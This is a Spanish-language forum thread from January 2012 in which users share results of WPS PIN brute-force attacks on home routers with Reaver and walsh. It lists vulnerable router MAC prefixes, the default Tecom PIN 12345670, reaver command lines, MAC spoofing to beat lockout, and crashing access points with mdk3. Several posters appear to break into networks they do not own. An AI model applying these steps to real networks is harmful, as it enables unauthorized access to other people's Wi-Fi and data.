https://code.google.com/p/reaver-wps/wiki/SupportedWirelessDrivers

Database

https://docs.google.com/spreadsheet/ccc?key=0Ags-JmeLMFP2dFp2dkhJZGIxTTFkdFpEUDNSSHZEN3c#gid=0
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Compota en Enero 07, 2012, 01:10:33 am
De todas las pruebas que he hecho solo he conseguido que avancen los porcentajes en una fte-xxxx.
Ni telefonicas 64680c, ni 001915, ni oranges, ni huawei vodafones.

De momento parece ser que solo se han conseguido resultados positivos en fte-xxxx y ono-xxxx ¿alguna más?
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Mr.Bunny en Enero 07, 2012, 10:42:55 am
Con las wlan_xxxx algunos ruters si se puede
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: salvarito en Enero 07, 2012, 12:31:38 pm
Yo estoy haciendo algunas pruebas y de momento a la unica que le he podido lanzar un ataque con resultados serios a sido a una Wlan_xx 00:19:15:xx:xx:xx en la que voy por un 8.29% con una tarjeta con chip RTL8187L. y avanzando, aunque esa red ya conozco datos y tiene encriptacion WEP, pero es solo por ver como trabaja con este router.

Tambien se que con la misma tarjeta en routers 5C:33:8E:xx:xx:xx y 00:19:70:xx:xx:xx ambos Orange-xxxx comienza el ataque pero aproximadamente con un avance del 0,98% aprox. aparece en mensaje:
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-trying
Y despues mas tarde:
[!] WARNING: Detected AP rate limiting, waiting 315 seconds before re-trying.

Pero lo mas curioso es que en estos routers de Orange ayer me paso eso pero hoy despues de mas de 12 horas lo intento nuevamente y me sigue apareciendo ese mismo mesaje, osea que es como si el router detectara la mac de mi tarjeta como un atacante y no me deja continuar pase el tiempo que pase. He pensado en usar macchanger pero creo que algo no hago bien porque se supone que incluso despues de haber cambiado la mac de la tarjeta me sigue el router diciendo que nada de nada, asi que o no hago el cambio de mac correctamente o no se....
haber como sigue avanzando esto que parece interesante.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ppp222ppp en Enero 08, 2012, 09:38:26 am
Al final he conseguido una ONOXXXX. El problema que tenia yo era que cambiaba la mac de mi adaptador, dejandola tal cual en unas 10h es conseguido la key. Ahora estoy con otro tipo de error me esta probando siempre el mismo pin y no avanza.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Blacklove24 en Enero 08, 2012, 23:57:41 pm
Hola, hoy mismo he conseguido en unas 5h la key de una WLAN_XXXX, he usado un adaptador broadcom (backtrack lo identifica como "b43").
También lo he intentado con una FTE-XXXX pero sobre le 6% surgió un error que no he conseguido que dsaparezca.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: posi69 en Enero 09, 2012, 00:03:40 am
Hola Blacklove24 puedes poner los 6 primeros numeros de la MAC de la WLAN_XXXX...Gracias
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: inproboj en Enero 09, 2012, 09:58:22 am
Confirmado que funciona en un Netgear de ONO_XXXX, atacando con una RTL8187 en unas 9 horas me ha fundido WPS y clave WPA, un gran trabajo del creador y de los que nos informais sobre estas cosas.
Un saludo
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ñanduti en Enero 09, 2012, 10:10:44 am
despues de 20 horas de ataque consegui el pin y la clave de un router de WLAN_XXXX y la mac empieza con 30:39:F2
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Blacklove24 en Enero 09, 2012, 21:27:58 pm
posi69 los tengo que mirar pero puedo casi asegurarte que son los mismos que los de la red de ñanduti 30:39:F2
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: salvarito en Enero 09, 2012, 21:30:35 pm
Despues de 12,32 horas de ataque y llegando a un 93% el ataque ha llegado a su fin encontrando el pin WPS y la clave WEP. Se trata de un router de telefonoca con la MAC: 00:19:15:xx:xx:xx
Como yo la clave WEP ya la tenia, solo me faltaba comprobar la efectividad del ataque para entregar el pin y todo correcto. Si se hubiese tratado de una clave WPA modificada, el usuario seguramente estaria tranquilo pensando en que su red es segura, sin darse cuenta que existe este agujero de seguridad.

Saludos.

Parece que no todos los routers se "defienden" igual a este ataque.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: posi69 en Enero 09, 2012, 21:31:28 pm
Subo de nuevo el post. ;)

Pruebas realizadas con las Alfas con una antena panel modelo APA-L2414 de 14dbi.
(http://img802..us/img802/240/testhh.jpg)
(http://img43..us/img43/6382/41384763.jpg)
(http://img829..us/img829/5465/31975837.jpg)
Comentar que con la awus036h es 30 segundos más rapida por cada 1% que con la awus036nha.

Probadas con éxito:
WLAN-XXXX   30:39:F2   en 6 horas   60% paso al 90%     rtl8187l      señal -66
FTE-XXXX      B4:74:9F   en 3 horas     7% paso al 90%     rtl8187l      señal -64

Probadas sin éxito:
WLAN_XXXX       00:19:15
WLAN_XXXX       38:72:C0
WLAN_XXXX       64:68:0C
FTE-XXXX          C0:D0:44
FTE-XXXX          94:FE:F4 
FTE-XXXX          04:C0:6F
FTE-XXXX          84:A8:E4
JAZZTEL_XXXX   38:72:C0
vodafoneXXXX   5C:4C:A9
vodafoneXXXX   4C:54:99
vodafoneXXXX   64:16:F0
Orange-XXXX    00:19:70


(http://img51..us/img51/8865/image00001ta.jpg)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: pinty_102 en Enero 09, 2012, 21:37:52 pm
esta herramienta escanea los aps soportados

Código: [Seleccionar]
walsh -i mon0
(http://img190..us/img190/474/sshot197.png)

salu2
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Enero 09, 2012, 21:40:41 pm
salvarito

Una contraseña WEP en ningún caso es segura.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Mr.Bunny en Enero 09, 2012, 21:43:24 pm
pero como haceis para ingresar luego en el ruter por clave wps ?? es que nose como acceder
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 09, 2012, 21:51:36 pm
@ salvarito
¡Sabía que lo conseguirías!  ;)
¡Enhorabuena!
¿Era con un routeur WLAN_XX configurado por defecto con WEP y bssid tipo 00:19:15:xx:xx:xx?
(Para que sea claro)
Son ya unos cuantos dispositivos que caen... Y como de costumbre los de vodafone y orange-livebox parecen estar un paso adelante de los demás proveedores nivel seguridad.
@ Mr bunny
Tu no tienes que hacer nada. Una vez conseguido el PIN; WPS reaver recupera la llave WPA porque el routeur se la manda  al cliente.
Desgraciadamente no puedo hacer pruebas con mi routeur en casa, no se traga el ataque WPS...Sería interesante si alguien pilla con wireshark los paquetes mandados al final de proceso y los pone aquí.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: haroll en Enero 09, 2012, 23:35:29 pm
Hola he sacado la clave de una D-link WPA2 PSK Con una Alpha AWUSO36H en unas 15h.Pero no si se sera la clave buena porque no se conecta ni con Win7 con una alpha ni con la tarjeta del portatil.Me pide el pin pero tampoco se conecta.Tampoco con otro pc y backtrack 5 me dice Bad Password.Alguien sabe que puede ser!?Gracias.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: posi69 en Enero 10, 2012, 00:45:03 am
Gracias pompiro por la info, aporto capturas de la nueva versión de Reaver 1.4... :D

(http://img853..us/img853/3707/portatil1.png)
(http://img12..us/img12/9025/portatil3.png)


(http://img51..us/img51/8865/image00001ta.jpg)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: pompiro en Enero 10, 2012, 00:48:46 am
Tarde, ya había escrito la nueva version antes, en la sección de wps-reaver
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: pikomule en Enero 10, 2012, 10:54:44 am
Tarde, ya había escrito la nueva version antes, en la sección de wps-reaver

donde puedo descargar la version 1.4, no la encuentro:
http://code.google.com/p/reaver-wps/downloads/list
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: pompiro en Enero 10, 2012, 11:08:24 am
pikomule ve a la sección de "reaver desde 0", en la ultima pagina explico como actualizar hasta la siguiente versión.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: pikomule en Enero 10, 2012, 11:20:01 am
pikomule ve a la sección de "reaver desde 0", en la ultima pagina explico como actualizar hasta la siguiente versión.

muchas gracias, lo intentare
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: posi69 en Enero 10, 2012, 15:14:23 pm
He estado haciendo pruebas con reaver 1.4, viendo los cambios y ahora el rt3070 va lento pero va, y una FTE-XXXX 04:C0:6F que antes no iba ahora si, pongo una captura de como aparece cuando se a bloqueado una Orange cuando iba por el 1%.
(http://img406..us/img406/6500/wpsf.png)


(http://img51..us/img51/8865/image00001ta.jpg)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: pikomule en Enero 10, 2012, 16:15:58 pm
que es el comando "walsh -i mon0 -c"?
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: eker en Enero 10, 2012, 16:19:18 pm
pues yo no se que pasa, pero bastantes redes se me asocia pero se queda ahí y no hace nada mas :S

EDITO: parece que solo funciona con la lista que te da el walsh -i mon0 -C, con las demas redes aunque pruebes no va :S

Por otra parte el ataque me va a 3 seconds/attempt, a cuanto os va a vosotros normalmente?
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Mr.Bunny en Enero 10, 2012, 16:48:14 pm
yo estoy probando cn una red ono de momento 0,26% onoxxxx wpa2
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: posi69 en Enero 10, 2012, 18:47:19 pm
El comando "walsh -i mon0 -c" te muestra los router que tienen activado el WPS. En Windows cuando te conectas sale así.
(http://img534..us/img534/8049/wps3.jpg)


(http://img51..us/img51/8865/image00001ta.jpg)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: pinty_102 en Enero 10, 2012, 20:44:19 pm
donde puedo descargar la version 1.4, no la encuentro:
http://code.google.com/p/reaver-wps/downloads/list

reaver+walsh1.4-r83.tar.gz

salu2
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Mr.Bunny en Enero 10, 2012, 21:14:58 pm
reaver+walsh1.4-r83.tar.gz

salu2

como se instala en backtrack?
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: pinty_102 en Enero 10, 2012, 21:27:18 pm

instalar archivos tar.gz

salu2
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ppp222ppp en Enero 10, 2012, 23:41:01 pm
pues yo no se que pasa, pero bastantes redes se me asocia pero se queda ahí y no hace nada mas :S

EDITO: parece que solo funciona con la lista que te da el walsh -i mon0 -C, con las demas redes aunque pruebes no va :S

Por otra parte el ataque me va a 3 seconds/attempt, a cuanto os va a vosotros normalmente?
yo probado con algunas de la lista que da  walsh y no funciona, supongo que el comando solo dice que ap tiene el wps activo pero no que realmente sea efectivo.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: sedyo en Enero 11, 2012, 15:04:16 pm
Hola, probado reaver 1.3 con chip 8187l en una OÑO_XXYY a funcionado perfectamente, aunque la primera vez se quedo bloqueado.
Lo he utilizado con la distro wifiway 3.0 despues de unas 8 horas me a dado el pin y la wpa (10 num) pin (5 num) (MAC 0C:3F... algo asi luego edito y pongo).

# reaver -i mon0 -b (MAC AP) 00:01:02:03:04:05 -vv
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Mr.Bunny en Enero 11, 2012, 15:08:03 pm
Sigo en pruebas con la red de onoxxxx lleva funcionando desde las 5 de la tarde de ayer
porcentaje 55%
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: dosariland en Enero 11, 2012, 15:47:52 pm
Hola a todos, es la primera vez que escribo, lo he probado y despues de +/- 10 horas me dio el pin y clave sobre un router neutro, pero la clave no es válida, 64 numeros/letras en minúscula, montado en live usb, subo foto a , saludos a todos.

editado
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Mr.Bunny en Enero 11, 2012, 16:02:16 pm
aver si el dueño tiene filtrado mac, porque si tiene contraseña de 64 digitos seguro que es un tipo muy seguro y que a tomado otras medidas a parte del pin
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: dosariland en Enero 11, 2012, 16:15:40 pm
aver si el dueño tiene filtrado mac, porque si tiene contraseña de 64 digitos seguro que es un tipo muy seguro y que a tomado otras medidas a parte del pin
Puede ser algo que venga de serie en los router c300brs4a pues he realizado la prueba a dos y en los dos salió los 64 digitos, es más, guardé las sesiones y al dia siguiente comprobe la key de nuevo, por si me habia equivocado, hace pin un par de veces y vuelve a salir la contraseña de 64 cifras completamente distinta ???.........
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Enero 11, 2012, 17:51:41 pm
dosariland

Bienvenido al foro. Por favor edita las capturas de imágenes antes de subirlas al foro. Gracias
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Mr.Bunny en Enero 11, 2012, 21:37:14 pm
Onoxxxx mac: C0:3F:0E:C1:XX:XX Sigo reventando porcentaje 80%
Inicio 5 de la tarde de ayer aprox o mas tarde no mucho mas
fin: a un no he finalizado sigo esperando

cuando finalize lo posteare
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: victor2g en Enero 11, 2012, 22:21:53 pm
como se instala en backtrack? Para los que tengan esta pregunta que se pasen por aqui: http://www.theprojectxblog.net/setting-up-reaver-the-wifi-protected-setup-attack-tool/
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Enero 12, 2012, 13:48:09 pm
Buenas..

Habiendo un subforo de linux que estáis usando algunos ¿porqué no lo explicáis en el para tenerlo a mano?

Mas..

Cosas que saber

No cuesta trabajo, no se hace SPAM y queda mucho mejor vistos los enlaces..
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Mr.Bunny en Enero 12, 2012, 15:11:15 pm
me baje el reaver 1.4 y no consigo instalar lo descomprimo me dirijo ala carpeta x consola
pongo cd reaver  y me tira error reaver install y nada y asi sucesivos comandos como se instala
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: pompiro en Enero 12, 2012, 15:32:29 pm
te tienes que dirigir a la carpeta src.
"cd reaver/src/"     
y despues se compila, o configura si es que hay que hacerlo.

PD: Si leyeseis lo que ponen otros usuarios pagina por pagina y no irse a la ultima como hacen muchos, no tendría porqué explicarlo tantas veces -.-""
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Mr.Bunny en Enero 12, 2012, 15:38:46 pm
Habian subido mal el archivo mira http://www.multiupload.com/P36664C5RE

no fue culpa mia yo mire en google varias paginas de como instalarlo ahora e consegido otro
este:
http://www.megaupload.com/?d=A8NWHHMH

todo lo he sacado del foro
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Chiller en Enero 12, 2012, 20:10:05 pm
He abierto un Ono en 3 horas!!!!!
Alguno lo habia conseguido en tan poco tiempo? Yo no al menos
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 12, 2012, 21:19:16 pm
¡Enhorabuena! Possi69 lo había conseguido en también unas tres horas, con red FTE-XXXX esta vez.
En todo caso, los dos demostréis el enorme agujero de seguridad, conseguir una WPA en 3 horas soñaba a ciencia ficción en 2011, en 2012 ya no!
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 14, 2012, 20:56:43 pm

Ataque exitoso en unas tres horas (con pausa, muy bien lo de poder guardar su sesión y volver a iniciarla, funciona muy bien)

SO: Xubuntu 11.10 i386
WPS Reaver versión 1.4
Adaptador wireless: TP-Link wn422G (v.2)
Chipset:ar9271 (Atheros USB)
Driver: ath9k

Conseguido sobre essid ONOXXXX (mezcla letras y números)
Routeur Netgear CG3 100D-RG (N hasta 300 mbps, 50 Mb de banda hancha)

El AP se rendí fácilmente, ninguno rechazo o bloqueo del WPS
En este caso todos los dígitos del PIN coinciden con el passs WPA menos el ultimo

(http://img851..us/img851/5337/victoire.png)

Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: lolo_lolo en Enero 14, 2012, 21:44:38 pm
 kcdtv

Ataque exitoso en unas tres horas (con pausa, muy bien lo de poder guardar su sesión y volver a iniciarla, funciona muy bien)



¿como se hace eso?


una pregunta para ejecutar el ataque reaver tengo que estar conectado a mi router desde otro dispotivito? o sea un clente conectado..
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 14, 2012, 22:33:58 pm
Se hace solo, en cuanto has intentado unos PIN, los memoriza.
Luego cuando vuelves con el mismo AP te pregunta si quieres volver dónde estabas. (primera liña de la consola justo arriba, "Restore previous session? (n/y)")
Este ataque más arriba se hizo sin cliente conectado.






Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ppp222ppp en Enero 15, 2012, 18:08:46 pm
alguien sabe en que carpeta se gusrda el archivo qur guarda cuando pausas el ataque con ctrl+c? uso live usb y me gustaria guardarme el archivo para volver a retomarlo otro dia.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: firpo en Enero 15, 2012, 19:47:15 pm
alguien sabe en que carpeta se gusrda el archivo qur guarda cuando pausas el ataque con ctrl+c?
El siguiente comando en consola:

find / -name reaver.db

Te mostrará la ruta a la carpeta donde está reaver.db y los ficheros correspondientes a ataques iniciados con éxito y que hayan sido pausados con Ctrol+C o se hayan parado solos.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ppp222ppp en Enero 15, 2012, 19:50:13 pm
El siguiente comando en consola:

find / -name reaver.db

Te mostrará la ruta a la carpeta donde está reaver.db y los ficheros correspondientes a ataques iniciados con éxito y que hayan sido pausados con Ctrol+C o se hayan parado solos.

muchas gracias
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: posi69 en Enero 15, 2012, 22:39:24 pm
Nuevo router FTE-XXXX  84:A8:E4 sacado en 5 horas del 36% paso al 90%, con reaver 1.4 R90 + AR9271 awsu036nha
Decir que con este router no podia con el rtl8187l-awsu036h, siempre enviaba el mismo pin, y hoy he probado con el ar9271-awsu036nha y ha empezado a probar pin sin problemas. Seguiré haciendo pruebas de otras que antes no podia.

(http://img703..us/img703/5849/instant1.png)

Probadas con éxito:
WLAN-XXXX   30:39:F2   en 6 horas       rtl8187l     
FTE-XXXX      B4:74:9F   en 3 horas       rtl8187l     
FTE-XXXX      84:A8:E4   en 5 horas        ar9271
FTE-XXXX      04:C0:6F   en 6 horas       rtl8187l

Probadas sin éxito:
WLAN_XXXX       00:19:15
WLAN_XXXX       38:72:C0
WLAN_XXXX       64:68:0C
FTE-XXXX          C0:D0:44
FTE-XXXX          94:FE:F4 
JAZZTEL_XXXX   38:72:C0
vodafoneXXXX   5C:4C:A9
vodafoneXXXX   4C:54:99
vodafoneXXXX   64:16:F0
Orange-XXXX    00:19:70


(http://img51..us/img51/8865/image00001ta.jpg)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 15, 2012, 23:20:55 pm
Tengo el sentimiento quel comportamiento del ath9k se ha mejorado bastante con la versión 1.4 de reaver  :)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: victor2g en Enero 16, 2012, 00:35:20 am
He conseguido que me funcione reaver en BT 5 pero no me sale como veo otras experiencias, en la consola me sale esto:
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: posi69 en Enero 16, 2012, 01:44:43 am
He estado haciendo pruebas con la FTE-XXXX 84:A8:E4 que comente que ayer no me iba, y que hoy he podido sacar la clave, y no es por el rtl8187l, al tener acceso al router he visto que solo llevaba 13 horas encendido, debera ser que lo habría bloqueado días atras haciendo pruebas y eso.

(http://img254..us/img254/9639/ashampoosnap2012011600h.jpg)
(http://img266..us/img266/5849/instant1.png)
(http://img193..us/img193/9451/instant2.png)


(http://img51..us/img51/8865/image00001ta.jpg)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: victor2g en Enero 16, 2012, 17:07:05 pm
Problema solucionado con reaver 1.4. Ya esta trabajando con una ONO, cuando termine comentare resultados. Gracias a todos
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Mikirriki en Enero 16, 2012, 20:03:01 pm
Buenas a todos, es mi primer mensaje en el foro así que... "Hola", y ahora una vez saludados todos... comento que con atheros ar5007eg reaver funciona perfectamente, comprobada onoxxxx sin ningún problema.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: managuas en Enero 16, 2012, 20:17:35 pm
pregunta lo que quito en claro es que de momento solo funciona con ONO y FTE ?
prueba hecha con una Vodafone ( g ) se asocia  pero los pin no avanzan 0% siempre parece un bucle
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Mikirriki en Enero 16, 2012, 20:36:37 pm
Por lo que he leído wlan_xxxx tb han caído algunas, yo he probado vodafonexxxx y Vodafonexxxx y de momento na de na, pero creo que es un problema con mi adaptador wifi, esta noche probaré un 8187L a ver si hace algo diferente, :)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: salvarito en Enero 16, 2012, 21:23:13 pm
Hola que tal Mikirriki, ademas de las que has dicho, efectivamente, alguna WLAN_XXXX yo tambien lo probe con una WLAN_XX que tenia esta opcion y fue efectivo el ataque. Pero lo que seria buena idea es agrupar en un post los routers que caen y los que aguantan el ataque a modo de presentacion: 11:22:33:xx:xx:xx

Pero de todos modos reaver creo que aun esta verde y a cada nueva version mejora en algo, asi que es posible que en un futuro caigan mas routers, Ahh, y los de Yacom tambien resisten el ataque los  WIFIXXXXXX.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: molini en Enero 17, 2012, 00:10:42 am
ola a todos puede ser que las redes onoxxxxxx  de estas bssid no sean vulnerables con reaver:  un saludo
E0:69:95
E0:CB:4E
                 
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: urtxiki en Enero 17, 2012, 23:22:36 pm
buenas alguna opinion sobre esto??

[img width=500 height=359]http://img534..us/img534/5889/wps.png[/img]

orange 5c338e
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: firpo en Enero 18, 2012, 01:08:55 am

5C:33:8E:XX:XX:XX    Orange-xxxx

Pues una defensa del router al sobrepasar un determinado número de intentos.  (WPS Locked)
Y probablemente, mientras no lo resetees tú manualmente, permanecerá así.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: juan1981 en Enero 18, 2012, 11:00:15 am
ola molini e de decir que yo e conseguido las contraseñas de esas lineas de onoxxxxxx bssid E0:69:95
E0:CB:4E con el reaver 1.4
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: urtxiki en Enero 18, 2012, 13:29:29 pm
x firpo
tengo q intentar guardar el avance y empezar a atacar con otra mac, igual tira no??
un saludo
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 18, 2012, 15:39:33 pm
La idea es buena, desgraciadamente con las versiones anteriores no funcionaba el cambio de mac con reaver, aunque te ponía que estaba cambiada.
Parece que ahora funciona con 1.4.  ;)
http://code.google.com/p/reaver-wps/issues/detail?id=99
Citar
Pues una defensa del routeur al sobrepasar un determinado número de intentos.  (WPS Locked)
Y probablemente, mientras no lo resetees tú manualmente, permanecerá así.
Es cierto que los orange-xxxx se tragan unos códigos y luego blockean el WPS (se puede comprobar con wlash)
No tengo orange_xxxx pero algunos routeurs se vuelven muy locos a base de ataques mdk3 a piñon, rollo crash y reinicio.
¿Me sigueís la corriente?
¿Y si conseguimos hacer crashear el AP y que cuando vuelve a funcionar reactiva el WPS?
Por probar...

Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: tulicoca en Enero 18, 2012, 20:30:43 pm
Bueno por fin me decido a postear, soy un gran lector del foro desde hace años pero nunca he posteado, pero creo que la ocasion lo requiere.

Haciedo pruebas, como todos en este post, me he topado con esto: HE REVENTADO UNA WLAN_XXXX EN SEGUNDOS.

(http://i2.photobucket.com/albums/y32/tulicoca/wps/WPS.jpg)

No se porque razon ha sido instantaneo pero hay teneis la prueba. No se si es el tipo de router o simplemente coincidencia de que el pin enviado ha sido el correcto.

¿Os ha pasado a alguno? Por cierto seguir asi, sois geniales. Un salu2.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: lolo_lolo en Enero 18, 2012, 20:49:37 pm
Que reaver as usado el 1.4?
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: tulicoca en Enero 18, 2012, 20:57:34 pm
Lolo_lolo correcto el 1.4 se ve la version en la foto. He comprobado la contraseña y es correcta me da paso.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Mr.Bunny en Enero 18, 2012, 21:17:35 pm
se puede reventar orange-xxxx
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ñanduti en Enero 18, 2012, 21:23:23 pm
yo he intentado un orange -xxxx con mac C0:AC:54 con revaer 1.3 y reaver 1.4 y de momento no sepuede yo en particular no pude
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: atim en Enero 18, 2012, 21:33:15 pm
Buenas;

Lolo_lolo correcto el 1.4 se ve la version en la foto. He comprobado la contraseña y es correcta me da paso.

Vaya, que sorpresa ya que si no me equivoco,  es la primera 001915 que muestra vulnerabilidad por este metodo. Estaria bien que pusieras mas datos tulicoca como adaptador wifi que has utilizado, distancia del router y si has repetido la prueba de forma satisfactoria o ha sido una casualidad.

¿El pin correcto era el primero que probó "12345670" ?

P.D. Edita tu captura con el nombre de la distro que has utilizado.

Un saludo.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ñanduti en Enero 18, 2012, 21:41:48 pm
si no me equivoco he leido por ahi que el reaver 1.4 la novedad que trae en el primer  ataque que hace el pin   es intentar sacar la clave por defecto   es decir que lan WLANXXXX con mac 00:19:15 sino me equivoco lo saco por defecto  en el el ataque que hiso
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: tulicoca en Enero 18, 2012, 21:52:44 pm
Hola atim, mi adaptador es un realtek 8187 de 2000mw.

He estado leyendo del asunto y esta casi confirmado las WLAN_XXXX con mac 00:19:15:XX:XX:XX el pin por defecto de origen es 12345670 y el creador del reaver a sabiendas de este dato ha incluido como primer envio del pin el 12345670.

En condiciones buenas este tipo de router de TECOM se revienta de 10 a 71 segundos.

Si no recuerdo mal el aeroscript me lo  cogia a -60.

Bueno habrá que ir confirmando, estos datos.


[time]Enero 18, 2012, 21:59:08 pm[/time]
Gracias atim, ya he editado la foto y he suprido el nombre de la distro. No habia caido en el detalle.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ZiFFeL en Enero 18, 2012, 22:10:58 pm
Ha sido tan rápido por el pin, ese pin lo llevan los dos que tengo, no se si habrá alguna manera de probar ese pin directame, los wlan_xxxx con la mac que pongo a continuación caerían como bien dices en segundos, el pin en cuestion es 12345670. Los que tengo son los de la mac 00:19:15:xx:xx:xx.

saludos
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: atim en Enero 18, 2012, 22:15:57 pm
Citar
Ha sido tan rápido por el pin, ese pin lo llevan los dos que tengo, no se si habrá alguna manera de probar ese pin directame, los wlan_xxxx con la mac que pongo a continuación caerían como bien dices en segundos, el pin en cuestion es 12345670. Los que tengo son los de la mac 00:19:15:xx:xx:xx.

saludos
En reaver 1.4 empieza el ataque con ese pin por defecto.

ZiFFeL, ¿tus dos router 001915 venian con el wps activado de fabrica?
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ZiFFeL en Enero 18, 2012, 22:37:10 pm
Así es.
Saludos
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: tulicoca en Enero 18, 2012, 22:43:59 pm
Como bien dice el titulo del post: vulnerabilidad muy grave en WPS de algunos fabricantes de router

Por ahora se lleva la palma TECOM 00:19:15
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 19, 2012, 01:00:55 am
Ha sido tan rápido por el pin, ese pin lo llevan los dos que tengo, no se si habrá alguna manera de probar ese pin directame, los wlan_xxxx con la mac que pongo a continuación caerían como bien dices en segundos, el pin en cuestion es 12345670. Los que tengo son los de la mac 00:19:15:xx:xx:xx.

saludos

para probar un PIN primero tenéis que añadir el argumento -p seguido por el pin que queréis probar
ejemplo
Citar
sudo reaver -i mon0 -b mac_routeur -p 12345678
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: firpo en Enero 19, 2012, 01:43:34 am
No tengo orange_xxxx pero algunos routeurs se vuelven muy locos a base de ataques mdk3 a piñon, rollo crash y reinicio.
